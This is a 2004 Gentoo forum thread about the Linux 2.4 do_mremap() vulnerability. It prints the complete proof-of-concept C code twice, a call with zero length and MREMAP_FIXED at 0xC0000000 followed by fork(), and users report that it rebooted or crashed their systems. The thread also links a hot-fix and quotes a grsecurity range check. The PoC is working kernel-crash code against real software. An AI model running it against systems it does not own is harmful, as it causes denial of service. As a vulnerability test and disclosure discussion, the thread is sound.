Bash[DevNull] Guru
Joined: 10 Oct 2003 Posts: 333
Posted: Tue Jan 06, 2004 9:36 am Post subject: mremap test util :-))) or kill you Penguin

/*
 * Proof-of-concept exploit code for do_mremap()
 *
 * Copyright (C) 2004 Christophe Devine and Julien Tinnes
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
 */
#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2
#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
                         size_t, old_size, size_t, new_size,
                         unsigned long, flags, void *, new_address );

int main( void )
{
    void *base;

    base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
                 MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );
    real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
                 (void *) 0xC0000000 );
    fork();
    return( 0 );
}
_________________
Biomechanical Artificial Sabotage Humanoid

Bash[DevNull] Guru
Joined: 10 Oct 2003 Posts: 333
Posted: Tue Jan 06, 2004 9:42 am Post subject:

Heh, on the stable (x86) 2.4.22-gentoo-r2 kernel with the GRSECURITY PATCH it doesn't work.
I have no time to rewrite and test the util, but I think it can be...
All in this small code...
#ifdef CONFIG_GRKERNSEC_PAX_SEGMEXEC
    if ((current->flags & PF_PAX_SEGMEXEC) &&
        (new_len > SEGMEXEC_TASK_SIZE || new_addr > SEGMEXEC_TASK_SIZE-new_len))
        goto out;
#endif
_________________
Biomechanical Artificial Sabotage Humanoid
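
The range test quoted in the post above, as an added example (not code from the post, the kernel or the grsecurity patch): a user-space model that runs it against the PoC's `new_address` and `new_size`. The i386 `TASK_SIZE` of 0xC0000000, `SEGMEXEC_TASK_SIZE` as half of it, and the names `range_check` and `strict_check` are assumptions; the zero-length refusal in `strict_check` is an illustrative hardening, not the linked hot-fix.

```c
#include <stdint.h>
#include <stdio.h>

/* Assumed i386 2.4 values (not stated in the thread). */
#define TASK_SIZE          0xC0000000u      /* end of user address space */
#define SEGMEXEC_TASK_SIZE (TASK_SIZE / 2)  /* user space halved under SEGMEXEC */

enum verdict { ACCEPT, REJECT_RANGE, REJECT_EMPTY };

/* The quoted comparison with the limit as a parameter. The first test
 * guards the subtraction, so limit - new_len cannot wrap around. */
static enum verdict range_check(uint32_t limit, uint32_t new_addr, uint32_t new_len)
{
    if (new_len > limit || new_addr > limit - new_len)
        return REJECT_RANGE;
    return ACCEPT;
}

/* Hypothetical stricter variant: also refuse an empty target mapping. */
static enum verdict strict_check(uint32_t limit, uint32_t new_addr, uint32_t new_len)
{
    enum verdict v = range_check(limit, new_addr, new_len);
    return (v == ACCEPT && new_len == 0) ? REJECT_EMPTY : v;
}

int main(void)
{
    static const char *name[] = { "accept", "out of range", "empty" };
    /* Constructed cases; the first is the PoC's (new_address, new_size). */
    static const struct { uint32_t addr, len; } c[] = {
        { 0xC0000000u, 0 },           /* zero length, exactly at TASK_SIZE */
        { 0x40000000u, 8192 },        /* ordinary in-range request */
        { 0xBFFFF000u, 8192 },        /* would run past TASK_SIZE */
        { 0x00001000u, 0xFFFFF000u }  /* length larger than the limit */
    };

    printf("%-10s %-10s %-13s %-13s %s\n",
           "new_addr", "new_len", "TASK_SIZE", "SEGMEXEC", "strict");
    for (size_t i = 0; i < sizeof c / sizeof c[0]; i++)
        printf("0x%08x 0x%08x %-13s %-13s %s\n",
               (unsigned)c[i].addr, (unsigned)c[i].len,
               name[range_check(TASK_SIZE, c[i].addr, c[i].len)],
               name[range_check(SEGMEXEC_TASK_SIZE, c[i].addr, c[i].len)],
               name[strict_check(TASK_SIZE, c[i].addr, c[i].len)]);
    return 0;
}
```

With a zero length the comparison against `TASK_SIZE` lets 0xC0000000 through because the address is equal to the limit, not above it; against the halved SEGMEXEC limit the same address is out of range.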

drspewfy Tux's lil' helper
Joined: 13 Dec 2003 Posts: 125 Location: Mexico
Posted: Tue Jan 06, 2004 11:14 am Post subject: i cant install lsof and login

I compiled the exploit..
and.. when I run it..
./mremap
my system got rebooted, my system rebooted suddenly in 2 seconds..
why ??
doesn't give root ??
my kernel is
2.4.20-gentoo-r5
and I tried with another kernel on another system and I got the same,
rebooted the system
with the r9.
well see ya
=)))
I hope you can give some help..
or how to fix the vulnerability

Bash[DevNull] Guru
Joined: 10 Oct 2003 Posts: 333
Posted: Tue Jan 06, 2004 11:59 am Post subject:

It is not an exploit that gives you root priv. It is a proof-of-concept exploit, which means it only shows that your system has this bug.
The hot-fix can be found here: https://forums.gentoo.org/viewtopic.php?t=121529
_________________
Biomechanical Artificial Sabotage Humanoid

drspewfy Tux's lil' helper
Joined: 13 Dec 2003 Posts: 125 Location: Mexico
Posted: Tue Jan 06, 2004 12:22 pm Post subject:

YES, but when I try the exploit
the system gets rebooted
....
:S
weird

fleed l33t
Joined: 28 Aug 2002 Posts: 756 Location: London
Posted: Tue Jan 06, 2004 12:30 pm Post subject:

Do you mean that the hotfix that Bash pointed to is worthless?

Simba n00b
Joined: 08 Nov 2002 Posts: 60
Posted: Tue Jan 06, 2004 8:43 pm Post subject:

It doesn't work with my kernel, although my kernel is an old 2.4.20-xfs-r3
kernel. ./mremap just quit with Segmentation fault, that's all.

RAPUL l33t
Joined: 29 Dec 2002 Posts: 664 Location: Valencia (SPAIN)
Posted: Thu Jan 08, 2004 4:38 pm Post subject: It doesn't work...

It does nothing for me.
I am still using an old gentoo-sources-2.4.20-r7 which has gone without rebooting for 80 days...
_________________
Entropy rulz world.
Redundancy sux.
World is full of redundancy.
World sux.

donwimani n00b
Joined: 05 Mar 2004 Posts: 19
Posted: Fri May 28, 2004 7:48 pm Post subject: understanding the code

Hi,
I was trying to understand how exactly the code makes the kernel crash.
sys_real_mremap() is declared by the code:
Code:
static inline _syscall5(
    void *, real_mremap,
    void *, old_address,
    size_t, old_size,
    size_t, new_size,
    unsigned long, flags,
    void *, new_address );

and by defining __NR_real_mremap to __NR_mremap
Code:
#define __NR_real_mremap __NR_mremap

a call to real_mremap() will result in a call to ENTRY(sys_call_table).__NR_mremap
which is the sys_mremap system call,
but this call only takes 4 arguments, so when using
Code:
real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED, (void *) 0xC0000000 );

this would actually be the same as
Code:
mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED);

so I thought...
my assumptions don't seem to be correct.
Can anyone help me understand the code?
regards
I'll put the full code here for reference
Code:
#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2
#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
                         size_t, old_size, size_t, new_size,
                         unsigned long, flags, void *, new_address );

int main( void )
{
    void *base;

    base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
                 MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );
    real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
                 (void *) 0xC0000000 );
    fork();
    return( 0 );
}